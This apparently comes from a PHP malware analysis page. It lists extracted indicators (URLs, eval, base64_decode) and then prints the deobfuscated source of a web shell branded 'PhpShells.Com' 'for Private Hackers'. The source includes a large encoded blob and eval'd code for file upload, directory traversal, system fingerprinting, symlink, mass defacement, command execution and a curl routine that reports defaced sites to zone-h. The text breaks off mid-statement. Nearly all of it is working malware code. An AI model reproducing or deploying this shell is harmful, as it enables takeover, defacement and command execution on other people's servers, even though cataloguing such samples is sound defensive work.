PHP Malware Analysis

Back to list

Tags

Encoding
base64_decode
URLs
https://fonts.googleapis.com/css?family=Supermercado+One&display=swap
http://www.zone-h.org/archive/notifier=
http://www.zone-h.org/archive/notifier=
http://www.zone-h.org/archive/notifier=
http://www.zone-h.org/archive/notifier=
http://www.zone-h.com/notify/single
https://llll.bid/gX3xrFUZhCr67Sv9yxTmUuPZUczED82xHdk6TGuZrjA5ZBKKpvx6JLdsm7zL6ctEkGWkYgrSmjjy9VeXw9JfBenCGcZDAQ.txt
Title
PhpShells.Com
Execution
eval
Input
_GET
_POST
Environment
php_uname
getcwd

Deobfuscated code

<?php

$UeXploiT = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUHHMM8iLN64IyMnPDEkN0gQBawA=";
$An0n_3xPloiTeR = "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";
eval("?><?php\r\n\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach(\$_POST as \$key=>\$value){\r\n\$_POST[\$key] = stripslashes(\$value);\r\n}\r\n}\r\necho '<!DOCTYPE HTML>\r\n<html>\r\n<head>\r\n\r\n<link href=\"https://fonts.googleapis.com/css?family=Supermercado+One&display=swap\" rel=\"stylesheet\">\r\n<title>PhpShells.Com</title>\r\n<style>\r\nbody{\r\nfont-family:Supermercado One, sans-serif;\r\nbackground-color: #000000;\r\nbackground-image: url();\r\nbackground-size: center; background-repeat:no-repeat; background-attachment: fixed; background-size: cover; background-position:center;\r\ncolor: red;\r\n}\r\n#content tr:hover{\r\nbackground-color: white;\r\ntext-shadow:0px 0px 2px ;\r\n}\r\n#content .first{\r\nbackground-color: white;\r\n}\r\ntable{\r\nborder: 5px #000000 dotted;\r\n}\r\na{\r\ncolor: white;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor:red;\r\ntext-shadow:0px 0px 10px #ffffff;\r\n}\r\ninput,select,textarea{\r\nborder: 1px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\n.lazy {\r\n  margin: 0;\r\n  font-family:Supermercado One;\r\n}\r\n</style>\r\n</head>\r\n</body>\r\n<body>\r\n<h1><center><font color=\"white\" face=\"\"><div class=\"lazy\">PhpShells for Private Hackers</font></center></h1>\r\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr><td><font color=\"white\">Path :</font> ';\r\nif(isset(\$_GET['path'])){\r\n\$path = \$_GET['path'];\r\n}else{\r\n\$path = getcwd();\r\n}\r\n\$path = str_replace('\\\\','/',\$path);\r\n\$paths = explode('/',\$path);\r\n\r\nforeach(\$paths as \$id=>\$pat){\r\nif(\$pat == '' && \$id == 0){\r\n\$a = true;\r\necho '<a href=\"?path=/\">/</a>';\r\ncontinue;\r\n}\r\nif(\$pat == '') continue;\r\necho '<a href=\"?path=';\r\nfor(\$i=0;\$i<=\$id;\$i++){\r\necho \"\$paths[\$i]\";\r\nif(\$i != \$id) echo \"/\";\r\n}\r\necho '\">'.\$pat.'</a>/';\r\n}\r\necho '</td></tr><tr><td>';\r\nif(isset(\$_FILES['file'])){\r\nif(copy(\$_FILES['file']['tmp_name'],\$path.'/'.\$_FILES['file']['name'])){\r\necho '<font color=\"green\">File Uploaded</font><br />';\r\n}else{\r\necho '<font color=\"red\">Can not Upload</font><br/>';\r\n}\r\n}\r\n\tif(isset(\$_GET['dir'])) {\r\n\t\$dir = \$_GET['dir'];\r\n\tchdir(\$dir);\r\n} else {\r\n\t\$dir = getcwd();\r\n}\r\n\$ip = gethostbyname(\$_SERVER['HTTP_HOST']);\r\n\$kernel = php_uname();\r\n\$ds = @ini_get(\"disable_functions\");\r\n\$show_ds = (!empty(\$ds)) ? \"<font color=red>\$ds</font>\" : \"<font color=#00FF66>No Security :) </font>\";\r\nif(!function_exists('posix_getegid')) {\r\n\t\$user = @get_current_user();\r\n\t\$uid = @getmyuid();\r\n\t\$gid = @getmygid();\r\n\t\$group = \"?\";\r\n} else {\r\n\t\$uid = @posix_getpwuid(posix_geteuid());\r\n\t\$gid = @posix_getgrgid(posix_getegid());\r\n\t\$user = \$uid['name'];\r\n\t\$uid = \$uid['uid'];\r\n\t\$group = \$gid['name'];\r\n\t\$gid = \$gid['gid'];\r\n}\r\necho \"Disable Functions : \$show_ds<br>\";\r\necho \"System : <font color=#00FF66>\".\$kernel.\"</font><br>\";\r\necho \"<center>\";\r\necho \"<hr>\";\r\necho \"[ <a href='?'>Home</a> ]\";\r\necho \"[ <a href='?dir=\$dir&to=zoneh'>Zone-h</a> ]\";\r\necho \"[ <a href='?dir=\$dir&to=jumping'>Jumping</a> ]\";\r\necho \"[ <a href='?dir=\$dir&to=sym'>Symlink</a> ]\";\r\necho \"[ <a href='?dir=\$dir&to=mass'>Mass Deface</a> ]\";\r\necho \"[ <a href='?dir=\$dir&to=cmd'>Command</a> ]\";\r\necho \"</center>\";\r\necho \"<hr>\";\r\nif(\$_GET['to'] == 'zoneh') {\r\n\tif(\$_POST['submit']) {\r\n\t\t\$domain = explode(\"\\r\\n\", \$_POST['url']);\r\n\t\t\$nick =  \$_POST['nick'];\r\n\t\techo \"Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=\$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=\$nick/published=0</a><br>\";\r\n\t\techo \"Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=\$nick' target='_blank'>http://www.zone-h.org/archive/notifier=\$nick</a><br><br>\";\r\n\t\tfunction zoneh(\$url,\$nick) {\r\n\t\t\t\$ch = curl_init(\"http://www.zone-h.com/notify/single\");\r\n\t\t\t\t  curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t\t\t  curl_setopt(\$ch, CURLOPT_POST, true);\r\n\t\t\t\t  curl_setopt(\$ch, CURLOPT_POSTFIELDS, 